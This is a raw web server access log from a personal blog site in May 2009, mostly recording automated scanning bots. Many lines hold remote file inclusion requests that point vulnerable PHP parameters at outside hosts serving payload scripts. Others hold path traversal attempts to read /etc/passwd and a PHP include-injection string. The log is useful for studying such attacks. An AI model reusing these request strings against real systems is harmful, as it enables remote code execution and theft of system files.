80.67.23.152 - - [05/May/2009:10:42:37 -0700] "GET /logs/access_071122.log//components/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.152 - - [05/May/2009:10:42:38 -0700] "GET /components/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.152 - - [05/May/2009:10:42:41 -0700] "GET /logs//components/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:10:44:21 -0700] "GET /logs/access_090221.log/index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:10:44:29 -0700] "GET /errors.php?error=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:10:44:29 -0700] "GET /logs/access_080115.log/errors.php?error=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:10:44:29 -0700] "GET /logs/errors.php?error=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:10:44:29 -0700] "GET /logs/access_080115.log/errors.php?error=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:10:44:29 -0700] "GET /logs/errors.php?error=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:10:44:29 -0700] "GET /errors.php?error=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:10:44:33 -0700] "GET /logs/access_080122.log/errors.php?error=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:10:44:33 -0700] "GET /logs/access_080122.log/errors.php?error=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:10:45:10 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
80.67.23.152 - - [05/May/2009:10:45:15 -0700] "GET /logs/access_080502.log//components/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.23.181.2 - - [05/May/2009:10:45:19 -0700] "GET /logs/access_080425.log%20%20/index.php?option=com_zoom&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://genericshears.com/blog/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:10:45:25 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
80.67.23.152 - - [05/May/2009:10:45:26 -0700] "GET /logs/access_080502.log//components/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.90.162 - - [05/May/2009:10:45:32 -0700] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:10:45:33 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:10:45:36 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.23.181.2 - - [05/May/2009:10:45:36 -0700] "GET /logs/access_080627.log%20%20/index.php?option=com_zoom&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://genericshears.com/blog/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:10:45:36 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [05/May/2009:10:45:37 -0700] "GET /logs/access_081117.log//index2.php?mosConfig_absolute_path=http://h1.ripway.com/yuni212/cinta.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.23.152 - - [05/May/2009:10:45:37 -0700] "GET /logs/access_080502.log//components/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.90.162 - - [05/May/2009:10:45:37 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:10:45:55 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
80.172.224.21 - - [05/May/2009:10:45:58 -0700] "GET /?t=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 42978 "-" "libwww-perl/5.825" "www.dmulk.com"
69.93.90.162 - - [05/May/2009:10:46:00 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 500 292 "-" "libwww-perl/5.805" "www.dmulk.com"
195.228.155.80 - - [05/May/2009:10:46:03 -0700] "GET /modules/ultrastats/include/functions_common.php?gl_root_path=http://www.wg.com.pl/downloads/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.234.41.5 - - [05/May/2009:10:46:15 -0700] "GET /logs/access_080928.log//modules/punish/p_error.php?exbb[home_path]=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.172.224.21 - - [05/May/2009:10:46:20 -0700] "GET /?t=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 42974 "-" "libwww-perl/5.825" "dmulk.com"
195.228.155.80 - - [05/May/2009:10:46:37 -0700] "GET /logs/access_080512.log/modules/ultrastats/include/functions_common.php?gl_root_path=http://www.wg.com.pl/downloads/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.228.155.80 - - [05/May/2009:10:46:38 -0700] "GET /modules/ultrastats/include/functions_common.php?gl_root_path=http://www.wg.com.pl/downloads/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.228.155.80 - - [05/May/2009:10:46:38 -0700] "GET /logs/modules/ultrastats/include/functions_common.php?gl_root_path=http://www.wg.com.pl/downloads/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:10:46:44 -0700] "GET /logs/access_080115.log%20%20/errors.php?error=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:10:46:44 -0700] "GET /logs/access_080122.log%20%20/errors.php?error=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:10:46:44 -0700] "GET /logs/access_080115.log%20%20/errors.php?error=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:10:46:44 -0700] "GET /logs/access_080122.log%20%20/errors.php?error=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:10:47:02 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
209.8.45.202 - - [05/May/2009:10:47:16 -0700] "GET /blog/index.php/2009/04/19/klr-04182009/comment-page-1/ HTTP/1.0" 200 19394 "http://dmulk.com/blog/2009/04/19/klr-04182009/comment-page-1/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "dmulk.com"
200.234.200.218 - - [05/May/2009:10:47:35 -0700] "GET /logs/access_080623.log/index.php?lang=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.218 - - [05/May/2009:10:47:40 -0700] "GET /logs/index.php?lang=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:10:47:46 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
72.30.81.171 - - [05/May/2009:10:47:58 -0700] "GET /logs/access_071012.log HTTP/1.0" 200 75692 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:10:48:00 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
203.24.100.137 - - [05/May/2009:10:48:00 -0700] "GET /logs/access_080621.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.24.100.137 - - [05/May/2009:10:48:07 -0700] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.6 - - [05/May/2009:10:48:09 -0700] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.73.143 - - [05/May/2009:10:48:10 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "Googlebot-Image/1.0" "dmulk.com"
66.249.73.143 - - [05/May/2009:10:48:10 -0700] "GET /blog/wp-content/uploads/picture-015-150x150.jpg HTTP/1.1" 200 11625 "-" "Googlebot-Image/1.0" "dmulk.com"
64.157.4.43 - - [05/May/2009:10:48:13 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
77.221.130.6 - - [05/May/2009:10:48:15 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [05/May/2009:10:48:21 -0700] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.218 - - [05/May/2009:10:48:24 -0700] "GET /index.php?lang=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 42993 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [05/May/2009:10:48:27 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.6 - - [05/May/2009:10:48:28 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 200 4407 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:10:48:28 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
89.111.184.103 - - [05/May/2009:10:48:32 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 200 4406 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.90.162 - - [05/May/2009:10:48:48 -0700] "GET /logs/access_081130.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.24.100.137 - - [05/May/2009:10:48:56 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 200 43209 "-" "libwww-perl/5.805" "www.dmulk.com"
124.83.159.229 - - [05/May/2009:10:48:59 -0700] "GET /robots.txt HTTP/1.1" 206 36 "-" "Y!J-SRD/1.0" "www.dmulk.com"
124.83.159.233 - - [05/May/2009:10:49:07 -0700] "GET /logs/access_080807.log HTTP/1.1" 206 307200 "-" "KDDI-CA33 UP.Browser/6.2.0.10.4 (compatible; Y!J-SRD/1.0; http://help.yahoo.co.jp/help/jp/search/indexing/indexing-27.html)" "www.dmulk.com"
212.158.163.67 - - [05/May/2009:10:49:12 -0700] "GET /logs/access_081019.log//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.158.163.67 - - [05/May/2009:10:49:13 -0700] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:10:49:26 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:49:27 -0700] "GET /logs///administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:49:27 -0700] "GET /logs/access_080831.log///administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:49:27 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:49:27 -0700] "GET /logs/access_090216.log///administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:49:35 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:49:35 -0700] "GET /logs///administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:49:35 -0700] "GET /logs/access_080831.log///administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:49:36 -0700] "GET /logs/access_090216.log///administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:10:49:41 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:49:49 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:49:49 -0700] "GET /logs///administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:49:49 -0700] "GET /logs/access_080831.log%20%20///administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:49:50 -0700] "GET /logs/access_090216.log%20%20///administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.228.155.80 - - [05/May/2009:10:51:03 -0700] "GET /logs/access_080522.log/modules/ultrastats/include/functions_common.php?gl_root_path=http://www.wg.com.pl/downloads/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.197.128.4 - - [05/May/2009:10:51:03 -0700] "GET /logs/access_090104.log%20%20//admin/index.php?o=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.197.128.4 - - [05/May/2009:10:51:03 -0700] "GET /logs//admin/index.php?o=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.197.128.4 - - [05/May/2009:10:51:03 -0700] "GET /admin/index.php?o=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:51:27 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.197.128.4 - - [05/May/2009:10:51:27 -0700] "GET /logs/access_080312.log%20%20//admin/index.php?o=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:51:27 -0700] "GET /logs///administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:51:27 -0700] "GET /logs/access_080406.log///administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:51:30 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:51:31 -0700] "GET /logs///administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:51:31 -0700] "GET /logs/access_080831.log///administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:51:32 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:51:32 -0700] "GET /logs/access_080406.log///administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:10:51:32 -0700] "GET /logs/access_090216.log///administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:51:32 -0700] "GET /logs///administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
165.219.245.62 - - [05/May/2009:10:51:38 -0700] "GET /bikes/dteel/Temp/IMG_3454s.JPG HTTP/1.1" 200 277018 "http://www.st-owners.com/forums/showthread.php?t=63518&page=4" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "dmulk.com"
118.219.232.137 - - [05/May/2009:10:51:38 -0700] "GET /logs///administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:51:38 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:51:38 -0700] "GET /logs/access_080406.log%20%20///administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.6 - - [05/May/2009:10:51:49 -0700] "GET /logs/access_081130.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.158.163.67 - - [05/May/2009:10:51:50 -0700] "GET /logs/access_090221.log//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:52:09 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:52:09 -0700] "GET /logs/access_080406.log///administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:52:09 -0700] "GET /logs///administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.184.103 - - [05/May/2009:10:52:13 -0700] "GET /logs/access_081130.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.75.4.169 - - [05/May/2009:10:52:40 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.4.169 - - [05/May/2009:10:52:40 -0700] "GET /index2.php?mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
165.219.245.62 - - [05/May/2009:10:52:54 -0700] "GET /bikes/dteel/Temp/IMG_3454s.JPG HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "dmulk.com"
165.219.245.62 - - [05/May/2009:10:52:55 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "dmulk.com"
69.93.90.162 - - [05/May/2009:10:53:40 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 200 4407 "-" "libwww-perl/5.805" "www.dmulk.com"
201.234.41.5 - - [05/May/2009:10:53:49 -0700] "GET /logs/access_090304.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.234.41.5 - - [05/May/2009:10:53:50 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
